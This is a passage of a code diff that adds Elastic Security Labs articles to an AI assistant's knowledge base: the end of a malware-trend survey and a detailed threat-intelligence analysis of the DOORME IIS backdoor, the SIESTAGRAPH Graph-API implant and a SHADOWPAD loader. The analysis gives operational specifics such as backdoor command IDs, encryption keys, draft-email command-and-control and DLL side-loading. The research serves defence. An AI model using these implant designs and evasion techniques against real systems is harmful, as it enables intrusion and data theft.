+Concerning User Account Control bypass, the primary method we observed was elevation by [mimicking trusted directories](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e), which is also related to DLL side-loading. Additionally, other methods like elevation via [extended startupinfo](https://github.com/decoder-it/psgetsystem) (elevated parent PID spoofing) are increasingly prevalent among commodity malware.
+
+![Privilege escalation top observed sub-techniques](/assets/images/unveiling-malware-behavior-trends/image1.png)
+
+
+As evident from the list below, there's a notable rise in the use of [vulnerable drivers](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) (BYOVD) to manipulate protected objects and acquire kernel mode execution privileges. 
+ 
+![The most effective endpoint behavior rules for privilege escalation](/assets/images/unveiling-malware-behavior-trends/image2.png)
+
+
+Below, you'll find a list of the most commonly exploited drivers triggered by our [YARA rules](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20vulndriver&type=code):
+
+![Top triggered yara rules for vulnerable drivers detection](/assets/images/unveiling-malware-behavior-trends/image18.png)
+
+
+### Execution
+
+Execution encompasses methods that lead to running adversary-controlled code on a local or remote system. These techniques are frequently combined with methods from other tactics to accomplish broader objectives, such as network reconnaissance or data theft. 
+
+The most common techniques observed here involved [Windows command and scripting languages](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Command+and+Scripting+Interpreter%22+%5B%22windows%22%5D&type=code), with the proxying of execution via the [Windows Management Instrumentation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1047%22&type=code) (WMI) interface closely trailing behind.
+
+![Execution techniques observed in our dataset](/assets/images/unveiling-malware-behavior-trends/image21.png)
+
+
+[Powershell](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.001%22&type=code) remains a preferred scripting language for malware execution chains, followed by [Javascript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.007%22&type=code) and [VBscript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.005%22&type=code). Multi-stage malware delivery routinely involves a combination of two or more scripting languages.
+
+![Execution top observed sub-techniques](/assets/images/unveiling-malware-behavior-trends/image5.png)
+
+
+Here is a list of the most frequently triggered endpoint behavior detections for this tactic:
+
+![Frequently triggered execution detections](/assets/images/unveiling-malware-behavior-trends/image13.png)
+
+
+Windows' default scripting languages remain the top preference for malware execution. However, there has been a slight uptick in the shift towards using other third-party scripting interpreters like Python, AutoIt, Java and Lua.
+
+### Persistence
+
+It's common for malware to install itself on an infected host. No surprises here: the most frequently observed persistence methods include [scheduled tasks](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1053.005%22&type=code), the [run key and startup folder](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1547.001%22&type=code), and [Windows services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code) (which typically require administrator privileges).
+
+![Top observed sub-techniques for persistence](/assets/images/unveiling-malware-behavior-trends/image14.png)
+
+
+The top three persistence sub-techniques depicted in the list below are also commonly encountered in regular software installations. Therefore, it's necessary to dissect them into multiple detections with additional suspicious signals to reduce false positives and enhance precision.
+
+![Top triggered alerts for persistence](/assets/images/unveiling-malware-behavior-trends/image8.png)
+
+
+### Initial Access
+
+Considering the dataset's composition, initial access was associated with primarily macro-enabled documents and Windows shortcut objects. Although a significant portion of the detonated samples also involved other formats, such as ISO/VHD containers with MSI installers extensively utilized for delivery, their genuine malicious behavior typically manifests in areas such as defense evasion and persistence.
+
+![Top sub-techniques for initial access](/assets/images/unveiling-malware-behavior-trends/image17.png)
+
+
+The most frequently abused Microsoft-signed binaries originating from malicious Microsoft Office documents align closely with execution and defense evasion tactics, command and scripting interpreters, and system binary proxy execution.
+
+![Top spawned child processes from malicious office documents](/assets/images/unveiling-malware-behavior-trends/image11.png)
+
+
+Here is a list of the most frequently triggered detections for initial access, regarding [phishing attachments](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1566.001%22&type=code):
+
+![Top triggered rules for initial access via malicious attachments](/assets/images/unveiling-malware-behavior-trends/image4.png)
+
+
+### Credential Access
+
+Credential access in malware is frequently linked to information stealers. The most targeted credentials are typically associated with [Windows Credential Manager](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.004%22&type=code) and [browser password](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.003%22&type=code) stores. Domain and system-protected credentials require elevated privileges and are more likely a feature of a subsequent stage.
+
+![Top observed credential access sub-techniques](/assets/images/unveiling-malware-behavior-trends/image20.png)
+
+
+Below a breakdown of the endpoint behavior detections that triggered the most on credentials access: 
+
+![Frequently triggered credential access-related detection rules ](/assets/images/unveiling-malware-behavior-trends/image3.png)
+
+
+The majority of credentials access behaviors resemble typical file access events. Therefore, it's essential to correlate and enrich them with additional signals to reduce false positives and enhance comprehension.
+
+## Conclusion
+
+Even though this small dataset of about [100,000 malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) represents only a fraction of the possible malware in the wild right now, we can still derive important insights from it about the most common TTPs using our behavioral detections. Those insights help us make decisions about detection engineering priorities, and defenders should make that part of their strategies.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/update_to_the_ref2924_intrusion_set_and_related_campaigns.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/update_to_the_ref2924_intrusion_set_and_related_campaigns.md
new file mode 100644
index 0000000000000..a13e29b77ae80
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/update_to_the_ref2924_intrusion_set_and_related_campaigns.md
@@ -0,0 +1,594 @@
+---
+title: "Update to the REF2924 intrusion set and related campaigns"
+slug: "update-to-the-REF2924-intrusion-set-and-related-campaigns"
+date: "2023-02-07"
+subtitle: "Elastic Security Labs is providing an update to the active intrusions using SIESTAGRAPH, DOORME, and SHADOWPAD, including malware analysis and associations with additional campaigns."
+description: "Elastic Security Labs is providing an update to the REF2924 research published in December of 2022. This update includes malware analysis of the implants, additional findings, and associations with other intrusions."
+author:
+  - slug: salim-bitam
+  - slug: remco-sprooten
+  - slug: cyril-francois
+  - slug: andrew-pease
+  - slug: devon-kerr
+  - slug: seth-goodwin
+image: "photo-edited-02@2x.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref2924
+  - siestagraph
+  - doorme
+  - shadowpad
+  - winnti
+  - chamelgroup
+  - apt41
+---
+
+## Key takeaways
+
+- DOORME is a malicious IIS module that provides remote access to a contested network.
+- SIESTAGRAPH interacts with Microsoft’s GraphAPI for command and control using Outlook and OneDrive.
+- SHADOWPAD is a backdoor that has been used in multiple campaigns attributed to a regional threat group with non-monetary motivations.
+- REF2924 analytic update incorporating third-party and previously undisclosed incidents linking the REF2924 adversary to Winnti Group and ChamelGang along technical, tactical, and victim targeting lines.
+
+## Preamble
+
+This research highlights the capabilities and observations of the two backdoors, named "DOORME" and "SIESTAGRAPH", and a backdoor called “SHADOWPAD” that was [disclosed by Elastic](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) in December of 2022. DOORME is an IIS (Internet Information Services) backdoor module, which is deployed to web servers running the IIS software. SIESTAGRAPH is a .NET backdoor that leverages the Microsoft Graph interface, a collection of APIs for accessing various Microsoft services. SHADOWPAD is an actively developed and maintained modular remote access toolkit.
+
+DOORME, SIESTAGRAPH, and SHADOWPAD each implement different functions that can be used to gain and maintain unauthorized access to an environment. The exact details of these functionalities will be described in further detail in this research publication. It is important to note that these backdoors can be used to steal sensitive information, disrupt operations, and gain a persistent presence in a victim environment.
+
+Additionally, we will discuss the relationships between REF2924 and three other intrusions carried out by the same threat group, intrusion set, or both. These associations are made using first-party observations and third-party reporting. They have allowed us to state with moderate confidence that SIESTAGRAPH, DOORME, SHADOWPAD, and other elements of REF2924 are attributed to a regional threat group with non-monetary motivations.
+
+> Additional information on the REF2924 intrusion setFor additional information on this intrusion set, which includes our initial disclosure as well as information into the campaign targeting the Foreign Ministry of an ASEAN member state, check out our [previous research into REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry).
+
+## DOORME code analysis
+
+### Introduction to backdoored IIS modules
+
+[IIS](https://www.iis.net/), developed by Microsoft, is an extensible web server software suite that serves as a platform for hosting websites and server-side applications within the Windows environment. With version 7.0, Microsoft has equipped IIS with a modular architecture that allows for the dynamic inclusion or exclusion of modules to suit various functional requirements. These modules correspond to specific features that the server can utilize to handle incoming requests.
+
+As an example, a backdoored module that overrides the [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method)event can be used to perform various malicious activities - such as capturing sensitive user information submitted to webpages, injecting malicious code into content served to visitors, or providing the attacker remote access to the web server. It is possible that a malicious module could intercept and modify a request before it is passed on to the server, adding an HTTP header or query string parameter that includes malicious code. When the server processes that modified request, the malicious code might be executed, allowing the attacker to gain unauthorized access or control the server and its resources.
+
+Adding to the danger of IIS backdoors is that they can be stealthy and organizations may not be aware that they have been compromised. Many companies do not have the resources or expertise to regularly monitor and test their IIS modules for vulnerabilities and malicious code, which can make it difficult to detect and remediate backdoors. To mitigate these risks, organizations should maintain a comprehensive inventory of all IIS modules and implement network and endpoint protection solutions to help detect and respond to malicious activities. Elastic Security Labs has seen increased use of this persistence mechanism coupled with defense evasions, which may disproportionately impact those hosting on-premises servers running IIS.
+
+### Introduction to the DOORME IIS module
+
+DOORME is a native backdoor module that is loaded into a victim's IIS infrastructure and used to provide remote access to the target infrastructure. We [first discussed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) the DOORME sample that we observed targeting the Foreign Ministry of an ASEAN member nation in December of 2022.
+
+DOORME uses the [**RegisterModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function) function, which is an export of a malicious C++ DLL module and is responsible for loading the module and setting up event handler methods. It also dynamically resolves API libraries that will be used later. The main functionality of the backdoor is implemented in the [**CGlobalModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class)class and its event handler, [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). This event handler is overridden by DOORME, allowing it to be loaded before a web request enters the IIS pipeline. The core functions of the backdoor (including cookie validation, parsing commands, and calling underlying command functions) are all located within this event handler. DOORME uses multiple obfuscation methods, an authentication mechanism, AES encryption implementation, and a purpose-built series of commands.
+
+This diagram illustrates the contrast between an attacker attempting to connect to a backdoored IIS server and a legitimate user simply trying to access a webpage.
+
+![Overview diagram of the DOORME backdoor](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image33.jpg)
+
+### Obfuscation
+
+#### String obfuscation
+
+DOORME XOR-encrypts strings to evade detection. These encrypted strings are then stored on the memory stack. As the original plaintext is obscured this string obfuscation makes it more difficult for security software or researchers to understand the purpose or meaning of the strings. The malware uses the first byte of every encrypted blob to XOR-decrypt the strings.
+
+![Pseudocode showcasing string obfuscation](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image22.jpg)
+
+#### Anti-disassembly technique
+
+The malware employs a technique that can cause disassemblers to incorrectly split functions in the code, which leads to the generation of incorrect assembly graphs. This technique can make it more challenging for analysts to understand the malware's behavior and create an effective defense against it.
+
+![Gaps in the assembly view of IDA pro](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image14.jpg)
+
+#### Control flow obfuscation
+
+The malware in question also employs a technique known as [Control Flow Obfuscation (CFO)](https://unprotect.it/technique/obscuring-control-flow/) to complicate the analysis of its behavior. CFO is a technique where the flow of instructions in the code is deliberately manipulated to make it more difficult for security software and researchers to understand the malware's functionality.
+
+The malware uses CFO to complicate the analysis process, but it is noteworthy that this technique is not applied to the entire codebase. From an analysis point of view, this tells us that these strings are of particular importance to the malware author - possibly to frustrate specific security tooling. The following example serves as a demonstration of how the malware uses CFO to conceal its functionality in the context of stack string XOR decryption.
+
+![Pseudocode showcasing CFO example](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image28.jpg)
+
+#### Dynamic import table resolution obfuscation
+
+Dynamic import table resolution is a technique used by malicious software to evade detection by security software. It involves resolving the names of the Windows APIs that the malware needs to function at runtime, rather than hard coding the addresses of these APIs in the malware's import table.
+
+DOORME first resolves the address of **LoadLibraryA** and **GetProcAddress** Windows API by parsing the **kernel32.dll** module export table, then uses the **GetProcAddress** function to locate the desired APIs within the modules by specifying the name of the API and the name of the DLL module that contains it.
+
+![Pseudocode showcasing import address table resolution](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image1.jpg)
+
+### Execution flow
+
+#### Authentication
+
+The malicious IIS module backdoor operates by looking for the string " **79cfdd0e92b120faadd7eb253eb800d0**" (the MD5 hash sum of a profane string), in a specific cookie of the incoming HTTP requests, when found it will parse the rest of the request.
+
+#### GET request handling
+
+**GET** requests are used to perform a status check: the malware returns the string “ **It works!”** followed by the **username** and the **hostname** of the infected machine. This serves as a means for the malware to confirm its presence on an infected machine.
+
+![GET request to the backdoor using curl command](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image3.jpg)
+
+#### POST requests handling
+
+The backdoor operator sends commands to the malware through HTTP POST requests as data which is doubly encrypted. Commands are AES-encrypted and then Base64 encoded, which the DOORME backdoor then decrypts.
+
+#### Base64 implementation
+
+The malware's implementation of Base64 uses a different index table compared to the default Base64 encoding RFC. The specific index table used by the malware is **"VZkW6UKaPY8JR0bnMmzI4ugtCxsX2ejiE5q/9OH3vhfw1D+lQopdABTLrcNFGSy7"** , while the normal index table used by the Base64 algorithm is **"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"**. This deviation from the standard index table makes it more difficult to decode the encoded data and highlights additional custom obfuscation techniques by the DOORME malware author in an attempt to frustrate analysis.
+
+#### AES algorithm implementation
+
+The malware uses [AES (Advanced Encryption Standard)](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) in CBC (Cipher Block Chaining) mode to encrypt and decrypt data. It uses the MD5 hash of the first 16 bytes of the authentication hash " **79cfdd0e92b120faadd7eb253eb800d0**", as the AES key. The initialization vector (IV) of the algorithm is the MD5 hash of the AES key.
+
+In our case the AES key is “ **5a430ab45c7e142c70018b99fe0d2da3”** and the AES IV is “ **57ce15b304a97772”**.
+
+### Command handling table
+
+The backdoor is capable of executing four different commands, each with its own set of parameters. To specify which command to run and pass the necessary parameters, the operators of the backdoor use a specific syntax. The command ID and its parameters are separated by the "pipe" symbol( **|** ).
+
+#### Command ID 0x42
+
+The first command implemented has the ID **0x42** and generates a Globally Unique Identifier (GUID) by calling the API **CoCreateGuid**. Used to identify the infected machine, this helps to track infected machines and allows the attacker to focus on specific high-value environments.
+
+![Pseudocode generating the GUID](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image13.jpg)
+
+#### Command ID 0x43
+
+Another command, ID **0x43** , is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process. This functionality is achieved by utilizing the Windows native functions **NtAllocateVirtualMemory** and **NtCreateThreadEx**.
+
+The **NtAllocateVirtualMemory** function is used to allocate memory in the same process for shellcode, while the **NtCreateThreadEx** function creates an execution thread with shellcode in that newly-allocated memory.
+
+![Pseudocode self-shellcode injection](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image27.jpg)
+
+#### Command ID 0x63
+
+Command ID **0x63** allows the attacker to send a blob of shellcode in chunks, which the malware reassembles to execute. It works by sending this command ID with a shellcode chunk as a parameter. Implants can detect that the shellcode has been fully received when the server communicates a different shellcode size than expected. This approach allows the malware to handle large shellcode objects with minimal validation.
+
+#### Command ID 0x44
+
+Command ID **0x44** provides a means of interacting with the shellcode being executed on the infected system. The attacker can send input to the shellcode and retrieve its output via a named pipe. This allows the attacker to control the execution of the shellcode and receive feedback, which may help to capture the output of tools deployed in the environment via the DOORME implant.
+
+### DOORME Summary
+
+In summary, DOORME provides a dangerous capability allowing attackers to gain unauthorized access to the internal network of victims through an internet-facing IIS web server. It includes multiple obfuscation techniques to evade detection, as well as the ability to execute additional malware and tools. Malware authors are increasingly leveraging IIS as covert backdoors that hide deep within the system. To protect against these threats, it is important to continuously monitor IIS servers for any suspicious activity, processes spawned from the IIS worker process ( **w3wp.exe** ), and the creation of new executables.
+
+## SIESTAGRAPH code analysis
+
+### Introduction to the SIESTAGRAPH implant
+
+The implant utilizes the [Microsoft Graph API](https://learn.microsoft.com/en-us/graph/overview) to access Microsoft 365 Mail and OneDrive for its C2 communication. It uses a predetermined tenant identifier and a refresh token to obtain access tokens. The implant uses the legitimate [OneDriveAPI library](https://github.com/KoenZomers/OneDriveAPI) which simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. The implant leverages sleep timers in multiple locations as a defense evasion technique. This led to the implant’s name: SIESTAGRAPH.
+
+![Overview diagram of the SIESTAGRAPH implant](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image11.jpg)
+
+### Execution flow
+
+SIESTAGRAPH starts and enters its main function which will set up the needed parameters to access Microsoft GraphAPI by requesting an access token based on a hard coded refresh token.
+
+![Initial setup of SIESTAGRAPH](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image26.jpg
+
+During the setup phase the malware uses the [Microsoft Office GUID](https://learn.microsoft.com/en-us/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in#application-ids-of-commonly-used-microsoft-applications:~:text=Microsoft%20Office,4102%2Daeff%2Daad2292ab01c) ( **d3590ed6-52b3-4102-aeff-aad2292ab01c** ). This is needed to supply access to both Microsoft 365 Mail and OneDrive.
+
+![Request an authentication token](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image19.jpg)
+
+### Authentication
+
+The SIESTAGRAPH author utilized a pre-determined tenant identifier and a refresh token to obtain access tokens. Both of these elements are essential in making a request for an access token. It is important to note that access tokens possess a limited lifespan, however, the refresh token can be utilized to request new access tokens as necessary.
+
+![Hard coded tenant and refresh tokens](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image15.jpg)
+
+To facilitate this process, the attacker utilized a third-party and legitimate library named [OneDriveAPI](https://github.com/KoenZomers/OneDriveAPI). This library simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. It should be noted that although third-party libraries such as OneDriveAPI can provide a convenient way to interact with APIs, they should not be considered to be malicious.
+
+![Use of third-party libraries](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image21.jpg)
+
+The malware utilizes the **GetAccessTokenFromRefreshToken** method to request an authentication token. This token is then used in all subsequent API requests.
+
+Refresh tokens have a [90-day expiration window](https://learn.microsoft.com/en-us/microsoft-365/enterprise/session-timeouts?view=o365-worldwide#:~:text=The%20default%20lifetime%20for%20the%20access%20token%20is%201%20hour.%20The%20default%20max%20inactive%20time%20of%20the%20refresh%20token%20is%2090%20days). So while the access token was being used by the Graph API for C2, the refresh token, which is needed to generate new access tokens, was not used within the expiration window. The refresh token was generated on 2022-11-01T03:03:44.3138133Z and expired on 2023-01-30T03:03:44.3138133Z. This means that a new refresh token will be needed before a new access token can be generated. As the refresh token is hard coded into the malware, we can expect SIESTAGRAPH to be updated with a new refresh token if it is intended to be used in the future.
+
+### Command and control
+
+A session token ( **sessionToken** ) is created by concatenating the process ID, machine name, username, and operating system. The session token is later used to retrieve commands intended for this specific implant.
+
+![Defining the session token](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image5.jpg)
+
+After obtaining authentication and session tokens, the malware collects system information and exfiltrates it using a method called **sendSession**.
+
+Inspecting the **sendSession** method we see that it creates an email message and saves it as a draft. Using draft messages is common C2 tradecraft as a way to avoid email interception and inspection.
+
+![The sendMessage method](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image6.jpg)
+
+After sending the session information to the attacker, the implant enters a loop in which it will check for new commands. By default, this beaconing interval is every 5 seconds, however, this can be adjusted by the attacker at any time.
+
+When receiving a command, the implant will use the **getMessages** method to check for any draft emails with commands from the attacker.
+
+![The getMessage method](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image9.jpg)
+
+With every call that contacts the Graph API, SIESTAGRAPH will receive the current authentication token ( **authToken** ). This token is then used in the HTTP request header following the **Authorization: Bearer** ( **“Authorization”, “Bearer “ + authToken** ).
+
+Every call to this method will contain the **sessionToken** , a command, and command arguments, separated with colons ( **:** ) ( **`<sessionToken>:<Command>:<command arguments>`** ).
+
+If a command has multiple arguments they will be split by a pipe ( **|** ). An example of this is the **rename** command where the source and destination names are split by a pipe.
+
+![Using a pipe for separating arguments](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image2.jpg)
+
+We have identified the following commands:
+
+| Command text   | Description                                                                   |
+| -------------- | ----------------------------------------------------------------------------- |
+| C              | Run a command                                                                 |
+| N              | Update the amount of time the binary will sleep between check-ins             |
+| D              | Upload a file to OneDrive                                                     |
+| U              | Download Item from Onedrive                                                   |
+| UU             | Check to see is Core.bin exists then Download item from Onedrive              |
+| ListDrives     | Send a list of the logical drives                                             |
+| GetDirectories | Send a list of given subdirectories                                           |
+| GetFiles       | Send a list of files in a given directory                                     |
+| Del            | Delete a given file                                                           |
+| Rename         | Rename a given file or directory                                              |
+| P              | Get a list of running processes                                               |
+| E              | Ends the execution of the binary                                              |
+| K              | Kill a given process ID                                                       |
+| S              | Update the amount of time the binary will sleep between check-ins (same as N) |
+| NET            | Get network information                                                       |
+| SS             | Take a screenshot                                                             |
+
+Several commands are self-explanatory ( **ListDrives** , **Rename** , etc.), however the run commands, update sleep timer, upload and download files, and take screenshots are more interesting and can provide a better understanding of the capabilities of SIESTAGRAPH.
+
+#### C - run command
+
+When the **C** command is received the malware runs the **runCommand** method. This method takes in the name of **cmd.exe** , the command line to run, and the number of milliseconds to wait for the new process to exit.
+
+If the command parameter is not null or empty, the method proceeds to create a new instance of the **System.Diagnostics.Process** class, which is used to start and interact with a new process. It sets the properties of the process instance's **StartInfo** property, which is of the **ProcessStartInfo** class, such as the **FileName** property to the **cmd** parameter passed to the method, the **Arguments** property to **/c** concatenated with the command parameter, and also sets **UseShellExecute** , **RedirectStandardInput** , **RedirectStandardOutput** , **RedirectStandardError,** and **CreateNoWindow** property. As this method is only called with the hard coded value of **cmd** for the **cmd** parameter, the resulting command will always be **`cmd /c <command to run>`**. This is a common way to run commands if one does not have direct access to an interactive shell.
+
+![The runCommand method](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image26.jpg
+
+#### N - Sleep timer update
+
+The sleep command is a single instruction. If the argument for the command is larger than 1000, the value for the **SleepTimer** variable is updated. This variable is later used to determine how long the process will sleep in between check-ins.
+
+![Updating the SleepTimer](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image4.jpg)
+
+#### D - Upload to OneDrive
+
+The **D** command is issued from the attacker’s perspective, so while they’re “downloading” from OneDrive, the host is “uploading” to OneDrive
+
+The method receives a **filePath** , and the authentication and session tokens. It will then upload the requested file to OneDrive. If the file is successfully uploaded, a response message is sent to the attacker using the format **OK|C:\foo\file.txt**.
+
+If the upload did not succeed the attacker will receive the error message **`OK|<Error message>`**.
+
+While this method might seem simple it helps to avoid detection by using common libraries while achieving the goal of exfiltrating data from the victim. While unconfirmed, this could be how the [exported Exchange mailboxes](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#exporting-exchange-mailboxes) were collected by the threat actor.
+
+![The uploadFile method](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image20.jpg)
+
+#### U - Download from OneDrive
+
+The download function is similar to the upload function. Again, from the attacker's perspective, the **U** command stands for upload. As the file is downloaded from OneDrive by the implant, but uploaded by the attacker.
+
+#### NET - Gather network information
+
+The **NET** command will gather network information and send it back to the attacker. In order to gather the information the binary first resolves two functions from the DLLs, **Ws2_32.dll** (the Windows socket API) and **iphlpapi.dll** (the Windows IP helper API).
+
+![Revolve functions from Ws2_32.dll and iphlpapi.dll](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image29.jpg)
+
+The **NET** command gathers information about open TCP connections from the system's TCP table. It then loops over all open connections and stores the information in an array that is sent back to the attacker. This code helps the attacker to get a better insight into the system's purpose within the network. As an example, if there are open connections for ports 587, 993, and 995, the host could be a Microsoft Exchange server.
+
+#### SS - Take screenshot
+
+To see the victim's desktop, SIESTAGRAPH can call the method named **TakeScreenShot** which takes a screenshot of the primary monitor and returns the screenshot as a Base64 encoded string.
+
+![The TakeScreenShot method](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image16.jpg)
+
+This function creates a new **Bitmap** object with the width and height of the primary screen's bounds. Then it creates a new **Graphics** object from the **Bitmap** object and uses the **CopyFromScreen** function to take a screenshot and copy it to the **Graphics** object.
+
+It then creates a new **MemoryStream** object and uses the **Save** method of the **Bitmap** object to save the screenshot as a PNG image into the memory stream. The image in the memory stream is then converted to a Base64 encoded string using the **Convert.ToBase64String** method. The resulting Base64 string is then sent back to the attacker by saving it as an email draft.
+
+### SIESTAGRAPH Summary
+
+SIESTAGRAPH is a purpose-built and full-featured implant that acts as a proxy for the threat actor. What makes SIESTAGRAPH more than a generic implant is that it uses legitimate and common, but adversary-controlled, infrastructure to deliver remote capabilities on the infected host.
+
+## SHADOWPAD loader code analysis
+
+### Introduction to log.dll
+
+When Elastic Security Labs [disclosed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#dll-side-loading) REF2924 in December of 2022, we observed an unknown DLL. We have since collected and analyzed the DLL, concluding it is a loader for the [SHADOWPAD](https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad) malware family.
+
+The DLL, **log.dll** , was observed on two Domain Controllers and was being side-loaded by an 11-year-old version of the Bitdefender Crash Handler (compiled name: **BDReinit.exe** ), named **13802 AR.exe** (in our example). Once executed, SHADOWPAD copies itself to **C:\ProgramData\OfficeDriver\*\* as **svchost.exe** before installing itself as a service. Once **log.dll** is loaded, it will spawn Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe,\*\* injecting into them which triggers a memory shellcode detection for Elastic Defend.
+
+At runtime, **log.dll** looks for the **log.dll.dat** file which contains the shellcode to be executed. Then **log.dll** will encrypt and store the **shellcode** in the registry and shred the original **log.dll.dat** file. If the file doesn’t exist it will skip this part.
+
+Then the sample will load the shellcode from the registry, RWX map it, and execute it from memory. If the registry key doesn’t exist the sample will crash.
+
+### Execution flow
+
+Our version of the SHADOWPAD DLL expects to be sideloaded by an 11-year-old and vulnerable version of the BitDefender **BDReinit.exe** binary. The offset to the trampoline ([jump instructions](https://gcc.gnu.org/onlinedocs/gcc-4.7.1/gccint/Trampolines.html)) in the vulnerable application is hard coded which means that the sample is tailored for this exact version of BitDefender’s binary ( **386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd** ). This side-loading behavior was previously [reported](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) by Positive Technologies.
+
+![log.dll’s hard coded offsets to BDReinit.exe](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image30.jpg)
+
+For our analysis, we patched **log.dll** to execute without the BitDefender sideloading requirement.
+
+### Capabilities
+
+#### Obfuscation
+
+The **log.dll** uses two lure functions to bypass automatic analysis.
+
+We define lure functions as benign and not related to malware capabilities, but intended to evade defenses, obfuscate the true capabilities of the malware, and frustrate analysis. They may trick time-constrained sandbox analysis by showcasing benign behavior while exhausting the analysis interval of the sandbox.
+
+![log.dll’s lure functions](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image8.jpg)
+
+**log.dll** incorporates a code-scattering obfuscation technique to frustrate static analysis, however, this doesn't protect the binary from dynamic analysis.
+
+This technique involves fragmenting the code into gadgets and distributing those gadgets throughout the binary. Each gadget is implemented as a single instruction followed by a call to a “resolver” function.
+
+![Obfuscated function prologue 1/2](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image12.jpg)
+
+![Obfuscated function prologue 2/2](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image24.jpg)
+
+The resolver function of each call resolves the address of the next gadget and passes execution.
+
+![Resolver function computing the next gadget address](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image10.jpg)
+
+The obfuscation pattern is simple and a trace can be used to recover the original instructions:
+
+```
+**result = []
+for i, x in enumerate(trace):
+ if "ret" in x:
+ result.append(trace[i + 1])**
+```
+
+#### API loading
+
+The sample uses the common [Ldr crawling technique](https://0xevilc0de.com/2018/02/25/locating-dll-name-from-the-process-environment-block-peb/) to find the address of **kernel32.dll.**
+
+![Searching for the process module list in the PEB’s Ldr](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image17.jpg)
+
+![Searching for kernel32.dll by name in the module list](/assets/images/update-to-the-REF2924-intrusion-set-and-related-campaigns/image18.jpg)
+
+Next, **log.dll** parses the exports of **kernel32.dll** to get the address of the **LoadLibraryA** and **GetProcAddress** functions. It uses **GetProcAddress** to resolve imports as needed.
+
+#### Persistence
+
+The sample expects to find a file called **log.dll.dat** in its root directory using the **FindFirstFile** and **FindNextFile** APIs. Once **log.dll.dat** is located, it is loaded, encrypted, and stored in the registry under the **`HKEY\_LOCAL\_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\\{1845df8d-241a-a0e4-02ea341a79878897\}\D752E7A8\}`** registry value.
+
+This registry value seems to be hard coded. If the file isn't found and the hard coded registry key doesn’t exist, the application crashes.
+
